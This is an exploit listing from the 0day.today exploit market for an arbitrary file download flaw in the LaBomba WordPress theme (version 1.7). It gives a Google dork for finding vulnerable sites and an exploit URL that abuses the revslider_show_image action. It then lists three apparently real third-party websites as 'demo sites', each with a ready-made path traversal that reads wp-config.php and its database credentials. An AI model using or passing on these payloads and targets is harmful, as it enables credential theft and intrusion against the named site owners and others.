[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Theme LaBomba Arbitrary File Download Vulnerability

Author
null_pointer
Risk
[
Security Risk High
]
0day-ID
0day-ID-22652
Category
web applications
Date add
17-09-2014
Platform
php
Exploit Title : WordPress Theme LaBomba Arbitrary File Download Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Vendor Homepage : http://themeforest.net/item/labomba-responsive-multipurpose-wordpress-theme/6106367

Version: 1.7

Google Dork : inurl:"/wp-content/themes/labomba/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme LaBomba suffers from Arbitrary File Download Vulnerability.

Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://oryany.dreamhosters.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://peoplepr.ro/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://xxlsport.hr/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2024-11-16]  #